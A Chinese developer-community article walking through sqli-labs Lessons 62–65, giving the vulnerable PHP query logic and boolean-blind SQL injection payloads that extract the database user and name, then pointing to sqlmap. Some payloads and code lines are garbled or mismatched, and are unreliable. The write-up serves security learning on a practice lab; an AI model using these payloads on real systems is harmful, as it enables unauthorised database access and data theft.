AI 助理
文档备案控制台
开发者社区 数据库 文章 正文

WEB常见漏洞之SQL注入(靶场篇—4)4

2023-05-20 401
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: WEB常见漏洞之SQL注入(靶场篇—4)

Lesson-62

该题为单括号单引号get型注入,利用方式包括布尔盲注、时间盲注

id=1'

目标SQL语句如下:

if($_POST['reset']):

 setcookie('challenge',' ',time()-3600000);

else:

  if($_COOKIE['challenge']):

     $sessid=$_COOKIE['challenge'];

  else:

     $expire =time()+60*60*24*30;

$hash =data($table,$col);

setcookie("challenge", $hash, $expire);

if($_GET['id']):

  $id=$_GET['id'];

  next_tryy()>=($times+1)

  $sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";

iftrue:

     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");

$pass = array_reverse($unames);

  输出查询信息;

else:

  输出报错;

注意:该题与Lesson58的利用方式相同,只不过拼接方式由单引号转为了单括号单引号,同时不再输出数据库报错信息,因此不能使用报错注入,只能使用盲注

使用布尔盲注判断注入点

id=1')--+

查询长度

id=1') and length(user())>13--+ //返回正常界面

id=1')and length(user())>14--+ //返回不同界面

两次结果不同,由此判断长度为 14

查询字符

id=1') and substr(user(),1,1)='r'--+ //返回正常界面

id=1')andleft(user(),1)='r'--+ //left()函数

id=1') and rand(ascii(substr(user(),1,1))=114--+ //ASCII码

id=1') and substr(user(),1,1)='s'--+ //返回不同界面

确定用户名为root@localhost

id=1') and substr(user(),1,14)='root@localhost'--+

以此类推根据返回界面是否不同即可查询数据库名、表名、列名等

id=1') and substr((select database()),1,14)='challenges'--+

手工注入太过繁琐,最后还是需要依赖 sqlmap 等注入工具来拿到最后的 key

Lesson-63

该题为单引号get型注入,利用方式包括布尔盲注、时间盲注

id=1'

目标SQL语句如下:

if($_POST['reset']):

 setcookie('challenge',' ',time()-3600000);

else:

  if($_COOKIE['challenge']):

     $sessid=$_COOKIE['challenge'];

  else:

     $expire =time()+60*60*24*30;

$hash =data($table,$col);

setcookie("challenge", $hash, $expire);

if($_GET['id']):

  $id=$_GET['id'];

  next_tryy()>=($times+1)

  $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

iftrue:

     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");

$pass = array_reverse($unames);

  输出查询信息;

else:

  输出报错;

注意:该题与Lesson62的利用方式相同,只不过拼接方式由单括号单引号转为了单引号

使用布尔盲注判断注入点

id=1'--+

查询长度

id=1' and length(user())>13--+ //返回正常界面

id=1'and length(user())>14--+ //返回不同界面

两次结果不同,由此判断长度为 14

查询字符

id=1' and substr(user(),1,1)='r'--+ //返回正常界面

id=1'andleft(user(),1)='r'--+ //left()函数

id=1' and rand(ascii(substr(user(),1,1))=114--+ //ASCII码

id=1' and substr(user(),1,1)='s'--+ //返回不同界面

确定用户名为root@localhost

id=1' and substr(user(),1,14)='root@localhost'--+

以此类推根据返回界面是否不同即可查询数据库名、表名、列名等

id=1' and substr((select database()),1,14)='challenges'--+

手工注入太过繁琐,最后还是需要依赖 sqlmap 等注入工具来拿到最后的 key

Lesson-64

该题为双括号get型注入,利用方式包括布尔盲注、时间盲注

id=1'

目标SQL语句如下:

if($_POST['reset']):

 setcookie('challenge',' ',time()-3600000);

else:

  if($_COOKIE['challenge']):

     $sessid=$_COOKIE['challenge'];

  else:

     $expire =time()+60*60*24*30;

$hash =data($table,$col);

setcookie("challenge", $hash, $expire);

if($_GET['id']):

  $id=$_GET['id'];

  next_tryy()>=($times+1)

  $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

iftrue:

     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");

$pass = array_reverse($unames);

  输出查询信息;

else:

  输出报错;

注意:该题与Lesson62的利用方式相同,只不过拼接方式由单括号单引号转为了双括号

使用布尔盲注判断注入点

id=1))--+

查询长度

id=1))and length(user())>13--+ //返回正常界面

id=1))and length(user())>14--+ //返回不同界面

两次结果不同,由此判断长度为 14

查询字符

id=1))and substr(user(),1,1)='r'--+ //返回正常界面

id=1))andleft(user(),1)='r'--+ //left()函数

id=1))and rand(ascii(substr(user(),1,1))=114--+ //ASCII码

id=1))and substr(user(),1,1)='s'--+ //返回不同界面

确定用户名为root@localhost

id=1))and substr(user(),1,14)='root@localhost'--+

以此类推根据返回界面是否不同即可查询数据库名、表名、列名等

id=1))and substr((selectdatabase()),1,14)='challenges'--+

手工注入太过繁琐,最后还是需要依赖 sqlmap 等注入工具来拿到最后的 key

Lesson-65

该题为单括号双引号get型注入,利用方式包括布尔盲注、时间盲注

id=1'

目标SQL语句如下:

if($_POST['reset']):

 setcookie('challenge',' ',time()-3600000);

else:

  if($_COOKIE['challenge']):

     $sessid=$_COOKIE['challenge'];

  else:

     $expire =time()+60*60*24*30;

$hash =data($table,$col);

setcookie("challenge", $hash, $expire);

if($_GET['id']):

  $id=$_GET['id'];

  $id ='"'.$id.'"';

  next_tryy()>=($times+1)

  $sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

iftrue:

     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");

$pass = array_reverse($unames);

  输出查询信息;

else:

  输出报错;

注意:该题与Lesson62的利用方式相同,只不过拼接方式由单括号单引号转为了单括号双引号

使用布尔盲注判断注入点

id=1")--+

查询长度

id=1") and length(user())>13--+ //返回正常界面

id=1")and length(user())>14--+ //返回不同界面

两次结果不同,由此判断长度为 14

查询字符

id=1") and substr(user(),1,1)='r'--+ //返回正常界面

id=1")andleft(user(),1)='r'--+ //left()函数

id=1") and rand(ascii(substr(user(),1,1))=114--+ //ASCII码

id=1") and substr(user(),1,1)='s'--+ //返回不同界面

确定用户名为root@localhost

id=1") and substr(user(),1,14)='root@localhost'--+

以此类推根据返回界面是否不同即可查询数据库名、表名、列名等

id=1") and substr((select database()),1,14)='challenges'--+

手工注入太过繁琐,最后还是需要依赖 sqlmap 等注入工具来拿到最后的 key

0x02 总结

该靶场是学习 SQL 注入的好途径,刷完全部题目后面对 SQL 注入的了解有很大帮助,整个靶场以 MySQL + PHP 搭建环境为主,根据不同环境切换了 Windows、Linux 以及 Tomcat 代理。如果想要测试目标点是否存在 SQL 注入,我们应该从请求方式、注入点闭合方式、请求头部、后端SQL语句以及注入方式等方面进行考虑,确定了这些后再想方设法绕过站点中的 WAF、编码限制,其实这就是手工注入的魅力,当然会使用 sqlmap 也是一件好事,有了手工+自动两种方式的结合,在面对一般的 SQL 注入问题都可以迎刃而解。至此,sql注入靶场完结。

0x03 知识星球

文章标签:
PHP
应用服务中间件
SQL
关系型数据库
Linux
Windows
MySQL
安全
数据库
关键词:
web漏洞
web漏洞靶场
SQL漏洞
SQL注入
web注入
云梦吖
目录
相关文章
varin
|
9月前
|
安全 测试技术 程序员
web渗透-文件包含漏洞
文件包含漏洞源于程序动态包含文件时未严格校验用户输入,导致可加载恶意文件。分为本地和远程包含,常见于PHP,利用伪协议、日志或session文件可实现代码执行,需通过合理过滤和配置防范。
varin
1383 79
web渗透-文件包含漏洞
varin
|
9月前
|
存储 安全 前端开发
Web渗透-文件上传漏洞-上篇
文件上传漏洞常见于Web应用,因类型限制不严可致恶意文件执行。本文介绍前端检测、MIME类型、黑名单、.htaccess、空格、双写等多种绕过方式,并结合upload-labs靶场演示利用方法,提升安全防护认知。
varin
2939 1
Web渗透-文件上传漏洞-上篇
varin
|
9月前
|
安全 中间件 应用服务中间件
WEB渗透-文件上传漏洞-下篇
本文详解文件上传安全漏洞,涵盖白名单绕过(如00截断、条件竞争)、图片木马制作与利用、以及IIS、Apache、Nginx等常见解析漏洞原理与防御。结合实战案例,深入剖析攻击手法与修复方案。
varin
748 1
varin
|
9月前
|
存储 JavaScript 安全
Web渗透-XSS漏洞深入及xss-labs靶场实战
XSS(跨站脚本攻击)是常见的Web安全漏洞,通过在网页中注入恶意脚本,窃取用户信息或执行非法操作。本文介绍其原理、分类(反射型、存储型、DOM型)、测试方法及xss-labs靶场实战案例,帮助理解与防御XSS攻击。
varin
2817 1
Web渗透-XSS漏洞深入及xss-labs靶场实战
varin
|
9月前
|
安全 程序员 数据库连接
web渗透-CSRF漏洞
CSRF(跨站请求伪造)是一种常见的Web安全漏洞,攻击者通过伪造用户请求,诱使其在已登录状态下执行非意愿操作。本文介绍CSRF原理、分类(站外与站内)、DVWA靶场搭建及防御措施,如同源策略与Token验证,提升安全防护意识。
varin
698 0
web渗透-CSRF漏洞
技术小牛人
|
SQL 存储 安全
SQL注入详解-6
技术小牛人
1534 0
技术小牛人
|
SQL 数据库 .NET
SQL注入详解-3
技术小牛人
953 0
技术小牛人
|
SQL 程序员 安全
SQL注入详解-2
技术小牛人
1070 0
技术小牛人
|
SQL 安全 程序员
SQL注入详解-1
技术小牛人
1254 0
技术小牛人
|
SQL 测试技术 数据库
SQL注入详解-4
技术小牛人
947 0

热门文章

最新文章

  • 1
    【WAF】三分钟了解Web应用防火墙
  • 2
    [解决办法]已经安装了数字证书,但是谷歌浏览器登录https协议的web系统时仍然提示证书不受信任
  • 3
    JSONView-web开发格式化和高亮插件
  • 4
    Web自动化测试框架(基础篇)--Selenium WebDriver工作原理和环境搭建
  • 5
    艾伟_转载:Web网站缓存文件并发问题解决方案
  • 6
    抓取Web网页数据分析
  • 7
    物理机不能访问虚拟机kali的web服务解决方案记录
  • 8
    [AliFlutter]Flutter for Web在无影中的应用
  • 9
    利用Redis撤销JSON Web Token产生的令牌
  • 10
    java Web 项目完整案例实操指南包含从搭建到部署的详细步骤及热门长尾关键词解析的实操指南
  • 1
    SQL语言小结
    453
  • 2
    (SQL)SQL语言中的查询语句整理
    441
  • 3
    为什么这些 SQL 语句逻辑相同,性能却差异巨大?
    354
  • 4
    SQL日志优化策略:提升数据库日志记录效率
    427
  • 5
    阿里云数据库RDS费用价格:MySQL、SQL Server、PostgreSQL和MariaDB引擎收费标准
    1529
  • 6
    阿里云数据库收费价格:MySQL、PostgreSQL、SQL Server和MariaDB引擎费用整理
    1602
  • 7
    SQL Server 2025 RC1 发布 - 从本地到云端的 AI 就绪企业数据库
    740
  • 8
    MCP与PolarDB集成技术分析:降低SQL门槛与简化数据可视化流程的机制解析
    775
  • 9
    阿里云数据库RDS支持MySQL、SQL Server、PostgreSQL和MariaDB引擎
    1084
  • 10
    生成更智能,调试更轻松,SLS SQL Copilot 焕新登场!
    776

    • 相关课程

    更多
  • Python Web开发基础
  • Java Web开发系列课程 - Spring框架入门
  • 企业Web常用架构LAMP-LNMP实战
  • 高校精品课-西安交通大学-Web 编程技术
  • Java Web项目实战 - 图书商城
  • Java面试疑难点解析 - Java Web开发

    • 相关电子书

    更多
  • Web应用系统性能优化
  • 高性能Web架构之缓存体系
  • PWA:移动Web的现在与未来
    • 下一篇
    一条命令迁移,帮你实现 OpenClaw 与 Hermes Agent 记忆互通!